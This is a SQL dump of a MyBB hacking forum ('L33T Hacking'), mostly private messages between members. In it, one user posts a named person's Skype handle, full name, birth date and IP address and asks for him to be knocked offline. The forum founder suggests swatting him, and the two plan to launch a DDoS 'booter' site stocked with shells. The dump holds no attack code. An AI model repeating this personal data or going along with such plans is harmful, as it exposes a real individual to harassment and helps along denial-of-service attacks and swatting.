\r\n[/quote]\r\n\r\nNo and when did he scam you?', '1352519466', '0', '3', '1352550641', '1', '0', '0', '1352550610'); INSERT INTO mybb_privatemessages VALUES('4076', '5', '5', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]Timmy[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: YouTube\r\nDescription: Create a YouTube video advertising LH, include your UID in the video.\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1352535383', '0', '0', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4077', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: DDoS', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. \r\n[/quote]\r\n\r\nNo and when did he scam you?\r\n[/quote]\r\n2 days ago. I just didn\'t really care because I was busy with other things. ', '1352550641', '0', '3', '1352570843', '1', '0', '2', '1352570786'); INSERT INTO mybb_privatemessages VALUES('4078', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. \r\n[/quote]\r\n\r\nNo and when did he scam you?\r\n[/quote]\r\n2 days ago. I just didn\'t really care because I was busy with other things. ', '1352550641', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4079', '341', '341', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"341\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum bouabda.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352555178', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4080', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: DDoS', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. \r\n[/quote]\r\n\r\nNo and when did he scam you?\r\n[/quote]\r\n2 days ago. I just didn\'t really care because I was busy with other things. \r\n[/quote]\r\n\r\nCan you provide me proof so I can ban him?', '1352570843', '0', '3', '1352579726', '1', '0', '0', '1352579675'); INSERT INTO mybb_privatemessages VALUES('4081', '342', '342', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"342\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum Squirt1971.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352571730', '0', '1', '0', '0', '0', '0', '1352571737'); INSERT INTO mybb_privatemessages VALUES('4082', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: DDoS', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. \r\n[/quote]\r\n\r\nNo and when did he scam you?\r\n[/quote]\r\n2 days ago. I just didn\'t really care because I was busy with other things. \r\n[/quote]\r\n\r\nCan you provide me proof so I can ban him?\r\n[/quote]\r\n\r\nHe isn\'t registered on this site. He is on a different forum and he got banned on it for scamming me. But I want him to learn his lesson by getting DDoSed', '1352579726', '0', '3', '1352580521', '1', '0', '2', '1352580476'); INSERT INTO mybb_privatemessages VALUES('4083', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. \r\n[/quote]\r\n\r\nNo and when did he scam you?\r\n[/quote]\r\n2 days ago. I just didn\'t really care because I was busy with other things. \r\n[/quote]\r\n\r\nCan you provide me proof so I can ban him?\r\n[/quote]\r\n\r\nHe isn\'t registered on this site. He is on a different forum and he got banned on it for scamming me. But I want him to learn his lesson by getting DDoSed', '1352579726', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4084', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: DDoS', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. \r\n[/quote]\r\n\r\nNo and when did he scam you?\r\n[/quote]\r\n2 days ago. I just didn\'t really care because I was busy with other things. \r\n[/quote]\r\n\r\nCan you provide me proof so I can ban him?\r\n[/quote]\r\n\r\nHe isn\'t registered on this site. He is on a different forum and he got banned on it for scamming me. But I want him to learn his lesson by getting DDoSed\r\n[/quote]\r\n\r\nOh OK since you have his IP, why not swat him?', '1352580521', '0', '3', '1352583405', '1', '0', '0', '1352583370'); INSERT INTO mybb_privatemessages VALUES('4085', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: DDoS', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. \r\n[/quote]\r\n\r\nNo and when did he scam you?\r\n[/quote]\r\n2 days ago. I just didn\'t really care because I was busy with other things. \r\n[/quote]\r\n\r\nCan you provide me proof so I can ban him?\r\n[/quote]\r\n\r\nHe isn\'t registered on this site. He is on a different forum and he got banned on it for scamming me. But I want him to learn his lesson by getting DDoSed\r\n[/quote]\r\n\r\nOh OK since you have his IP, why not swat him?\r\n[/quote]\r\nSwat as in?\r\nIf you mean DDoS him by myself, that\'s the thing I don\'t know any good DDoSing tools.', '1352583405', '0', '3', '1352589750', '1', '0', '2', '1352589587'); INSERT INTO mybb_privatemessages VALUES('4086', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: DDoS', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. \r\n[/quote]\r\n\r\nNo and when did he scam you?\r\n[/quote]\r\n2 days ago. I just didn\'t really care because I was busy with other things. \r\n[/quote]\r\n\r\nCan you provide me proof so I can ban him?\r\n[/quote]\r\n\r\nHe isn\'t registered on this site. He is on a different forum and he got banned on it for scamming me. But I want him to learn his lesson by getting DDoSed\r\n[/quote]\r\n\r\nOh OK since you have his IP, why not swat him?\r\n[/quote]\r\nSwat as in?\r\nIf you mean DDoS him by myself, that\'s the thing I don\'t know any good DDoSing tools.', '1352583405', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4087', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: DDoS', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nSkype: junaidrafi101\r\nName: Junaid Rafi\r\nAge: March 6, 1999\r\nIP: 173.34.86.248\r\n\r\nBoot this guy offline please! :D\r\n[/quote]\r\n\r\nForwarded to my friend who is a good DDoSer, not talking about Gron.\r\n[/quote]\r\nThanks.\r\nIs it sirchamp??\r\n:p\r\nBitch scammed me $30. \r\n[/quote]\r\n\r\nNo and when did he scam you?\r\n[/quote]\r\n2 days ago. I just didn\'t really care because I was busy with other things. \r\n[/quote]\r\n\r\nCan you provide me proof so I can ban him?\r\n[/quote]\r\n\r\nHe isn\'t registered on this site. He is on a different forum and he got banned on it for scamming me. But I want him to learn his lesson by getting DDoSed\r\n[/quote]\r\n\r\nOh OK since you have his IP, why not swat him?\r\n[/quote]\r\nSwat as in?\r\nIf you mean DDoS him by myself, that\'s the thing I don\'t know any good DDoSing tools.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-79.html\r\n\r\n\r\nChecking the \"swatting\" point.', '1352589750', '0', '1', '0', '1', '0', '0', '1352597027'); INSERT INTO mybb_privatemessages VALUES('4088', '1', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'ps3?', '0', 'hey do have ps3\r\nif you do add me:\r\n\r\n\r\nxPRO_CALIBERx', '1352595963', '0', '3', '1352596575', '1', '0', '2', '1352596539'); INSERT INTO mybb_privatemessages VALUES('4089', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'ps3?', '0', 'hey do have ps3\r\nif you do add me:\r\n\r\n\r\nxPRO_CALIBERx', '1352595963', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4090', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: ps3?', '0', '[quote=\'XxTREYZxX\']\r\nhey do have ps3\r\nif you do add me:\r\n\r\n\r\nxPRO_CALIBERx\r\n[/quote]\r\n\r\nI don\'t have a PSN id due to security reasons and I\'m not into gaming that much sorry :D', '1352596575', '0', '3', '1352617130', '1', '0', '0', '1352617021'); INSERT INTO mybb_privatemessages VALUES('4091', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Online Booters?', '0', 'Hey can you give me a link to an online booter so I can attack someone\'s IP? :p ', '1352603770', '0', '3', '1352603877', '1', '0', '2', '1352603824'); INSERT INTO mybb_privatemessages VALUES('4092', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Online Booters?', '0', 'Hey can you give me a link to an online booter so I can attack someone\'s IP? :p ', '1352603770', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4093', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Online Booters?', '0', '[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?', '1352603877', '0', '3', '1352603955', '1', '0', '0', '1352603920'); INSERT INTO mybb_privatemessages VALUES('4094', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.', '1352603955', '0', '3', '1352604085', '1', '0', '2', '1352604028'); INSERT INTO mybb_privatemessages VALUES('4095', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.', '1352603955', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4096', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Online Booters?', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D', '1352604085', '0', '3', '1352604174', '1', '0', '0', '1352604159'); INSERT INTO mybb_privatemessages VALUES('4097', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D\r\n[/quote]\r\n\r\nWe as in you. :p', '1352604174', '0', '3', '1352607351', '1', '0', '2', '1352607273'); INSERT INTO mybb_privatemessages VALUES('4098', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D\r\n[/quote]\r\n\r\nWe as in you. :p', '1352604174', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4099', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Online Booters?', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D\r\n[/quote]\r\n\r\nWe as in you. :p\r\n[/quote]\r\nWell I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking.\r\n\r\n', '1352607351', '0', '3', '1352647880', '1', '0', '0', '1352647856'); INSERT INTO mybb_privatemessages VALUES('4100', '1', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: ps3?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'XxTREYZxX\']\r\nhey do have ps3\r\nif you do add me:\r\n\r\n\r\nxPRO_CALIBERx\r\n[/quote]\r\n\r\nI don\'t have a PSN id due to security reasons and I\'m not into gaming that much sorry :D\r\n[/quote]\r\n\r\nall guds', '1352617130', '0', '1', '0', '1', '0', '2', '1352661210'); INSERT INTO mybb_privatemessages VALUES('4101', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: ps3?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'XxTREYZxX\']\r\nhey do have ps3\r\nif you do add me:\r\n\r\n\r\nxPRO_CALIBERx\r\n[/quote]\r\n\r\nI don\'t have a PSN id due to security reasons and I\'m not into gaming that much sorry :D\r\n[/quote]\r\n\r\nall guds', '1352617130', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4102', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D\r\n[/quote]\r\n\r\nWe as in you. :p\r\n[/quote]\r\nWell I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking.\r\n\r\n\r\n[/quote]\r\nSure. ', '1352647880', '0', '3', '1352661240', '1', '0', '2', '1352661216'); INSERT INTO mybb_privatemessages VALUES('4103', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D\r\n[/quote]\r\n\r\nWe as in you. :p\r\n[/quote]\r\nWell I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking.\r\n\r\n\r\n[/quote]\r\nSure. ', '1352647880', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4104', '345', '345', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"345\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum ZetaHunter.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1352654895', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4105', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Online Booters?', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D\r\n[/quote]\r\n\r\nWe as in you. :p\r\n[/quote]\r\nWell I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking.\r\n\r\n\r\n[/quote]\r\nSure. \r\n[/quote]\r\n\r\nJust think of a good name then I will set it up :)', '1352661240', '0', '3', '1352661867', '1', '0', '0', '1352661830'); INSERT INTO mybb_privatemessages VALUES('4106', '1', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D\r\n[/quote]\r\n\r\nWe as in you. :p\r\n[/quote]\r\nWell I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking.\r\n\r\n\r\n[/quote]\r\nSure. \r\n[/quote]\r\n\r\nJust think of a good name then I will set it up :)\r\n[/quote]\r\nSomething with L33t in it.\r\nLike iTzL33tBoot\r\nxD\r\n\r\nI don\'t know really. Your choice.', '1352661867', '0', '3', '1352662166', '1', '0', '2', '1352662068'); INSERT INTO mybb_privatemessages VALUES('4107', '82', '1', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Online Booters?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D\r\n[/quote]\r\n\r\nWe as in you. :p\r\n[/quote]\r\nWell I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking.\r\n\r\n\r\n[/quote]\r\nSure. \r\n[/quote]\r\n\r\nJust think of a good name then I will set it up :)\r\n[/quote]\r\nSomething with L33t in it.\r\nLike iTzL33tBoot\r\nxD\r\n\r\nI don\'t know really. Your choice.', '1352661867', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4108', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: Online Booters?', '0', '[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'iTzIpod\']\r\nHey can you give me a link to an online booter so I can attack someone\'s IP? :p \r\n[/quote]\r\n\r\nFree or Paid?\r\n[/quote]\r\nIf there\'s any free working booters.. Yeah I would like that.\r\nIf it\'s paid.. Then :/ I don\'t got the money to afford one.\r\n[/quote]\r\n\r\nNo free one that I\'m aware of. Maybe we can make a online booter for LH :D\r\n[/quote]\r\n\r\nWe as in you. :p\r\n[/quote]\r\nWell I can make it and add shells daily but can\'t take real care of it as a owner so you can be the owner. If someone asks who founded the site then say l33t hacking.\r\n\r\n\r\n[/quote]\r\nSure. \r\n[/quote]\r\n\r\nJust think of a good name then I will set it up :)\r\n[/quote]\r\nSomething with L33t in it.\r\nLike iTzL33tBoot\r\nxD\r\n\r\nI don\'t know really. Your choice.\r\n[/quote]\r\n\r\nI like the name lol. Do you know where to get private shells from?', '1352662166', '0', '0', '0', '1', '0', '0', '0'); DROP TABLE IF EXISTS mybb_profilefields; CREATE TABLE mybb_profilefields ( fid smallint(5) unsigned NOT NULL auto_increment, name varchar(100) NOT NULL, description text NOT NULL, disporder smallint(5) unsigned NOT NULL, type text NOT NULL, length smallint(5) unsigned NOT NULL, maxlength smallint(5) unsigned NOT NULL, required int(1) NOT NULL, editable int(1) NOT NULL, hidden int(1) NOT NULL, postnum bigint(30) NOT NULL, PRIMARY KEY (fid) ); DROP TABLE IF EXISTS mybb_promotionlogs; CREATE TABLE mybb_promotionlogs ( plid int(10) unsigned NOT NULL auto_increment, pid int(10) unsigned NOT NULL, uid int(10) unsigned NOT NULL, oldusergroup varchar(200) NOT NULL, newusergroup smallint(6) NOT NULL, dateline bigint(30) NOT NULL, type varchar(9) DEFAULT 'primary' NOT NULL, PRIMARY KEY (plid) ); INSERT INTO mybb_promotionlogs VALUES('1', '1', '150', '2', '16', '1351248386', 'primary'); DROP TABLE IF EXISTS mybb_promotions; CREATE TABLE mybb_promotions ( pid int(10) unsigned NOT NULL auto_increment, title varchar(120) NOT NULL, description text NOT NULL, enabled tinyint(1) DEFAULT '1' NOT NULL, logging tinyint(1) NOT NULL, posts int(11) NOT NULL, posttype char(2) NOT NULL, registered int(11) NOT NULL, registeredtype varchar(20) NOT NULL, reputations int(11) NOT NULL, reputationtype char(2) NOT NULL, referrals int(11) NOT NULL, referralstype char(2) NOT NULL, requirements varchar(200) NOT NULL, originalusergroup varchar(120) NOT NULL, newusergroup smallint(5) unsigned NOT NULL, usergrouptype varchar(120) NOT NULL, PRIMARY KEY (pid) ); DROP TABLE IF EXISTS mybb_reportedposts; CREATE TABLE mybb_reportedposts ( rid int(10) unsigned NOT NULL auto_increment, pid int(10) unsigned NOT NULL, tid int(10) unsigned NOT NULL, fid int(10) unsigned NOT NULL, uid int(10) unsigned NOT NULL, reportstatus int(1) NOT NULL, reason varchar(250) NOT NULL, dateline bigint(30) NOT NULL, PRIMARY KEY (rid), KEY fid (fid), KEY dateline (dateline) ); INSERT INTO mybb_reportedposts VALUES('1', '3', '1', '2', '1', '1', 'test', '1339998087'); INSERT INTO mybb_reportedposts VALUES('2', '320', '128', '40', '9', '1', 'Disallowed BH', '1345120431'); 